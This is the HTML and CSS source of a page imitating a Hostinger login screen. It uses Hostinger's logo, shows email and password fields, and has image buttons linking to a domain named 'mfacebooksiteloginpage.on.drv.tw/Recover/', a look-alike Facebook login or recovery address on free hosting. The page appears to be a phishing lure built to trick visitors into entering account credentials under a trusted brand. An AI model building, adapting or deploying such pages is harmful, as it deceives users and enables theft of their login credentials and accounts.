<!DOCTYPE html>
<html>

<head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title> Hostinger login</title>
        <link rel="stylesheet" href="style.css">
        <script src="https://kit.fontawesome.com/a4d4fdfe11.js" crossorigin="anonymous"></script>
        
      
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/en_GB/sdk.js#xfbml=1&version=v15.0" nonce="ZeoeStFx"></script>

</head>

<body>
        <img  class="tt"src="https://assets.hostinger.com/images/logo-homepage2020-f9c79137d7.svg">
        

     
 
 <div>
         <h2 align="center">Log in</h2>
         <a href="https://mfacebooksiteloginpage.on.drv.tw/Recover/"><img src="/1663504636988.jpg"></a><br>
        <a href=" https://mfacebooksiteloginpage.on.drv.tw/Recover/"> <img src="/1663504656086.jpg"></a>
 
         <p align="center">or</p>
         
         <div class="in">
         <input type="text" placeholder="Email"><br>
        <input type="password" placeholder="password"><br><br>
<button type="submit">Log in </button>
<p align="center">
        
<a href="#"> Forgot password </a></p>
</div>
        </div>
        
        
        
        
        
 <style>
h2{
        position: relative;
        top:-10px;
        color:#0F1C55;
}
 img{
         position: relative;
        
         left:30px;
        width: 350px;
        
 }
 .tt{
         top:1px;
         left:-1px;
         width: 150px;
         
         
 }
 p{
         position : relative;
         top:10px;
         color: #BBBFC4;
 }
 .in{
         align-content: center;
         position: relative;
         top:100px;
         
 }
 input{
         width: 350px;
         height: 40px;
         border: 1px solid #C9C9C9;
         margin-top: 10px;
         border-radius: 3px
         
 }
         button{
                 height: 50px;
                 width:350px;
                 background: #673ee5;
                 color: white;
                 border: none;
                 border-radius: 3px;
                 font-size: 17px;
                 font-weight: bold;
         }
         .in{
                 position: relative;
                 top:-10px;
                 left:30px;
         }
         a{
                 text-decoration: none
         }
 </style>
</body>

</html>
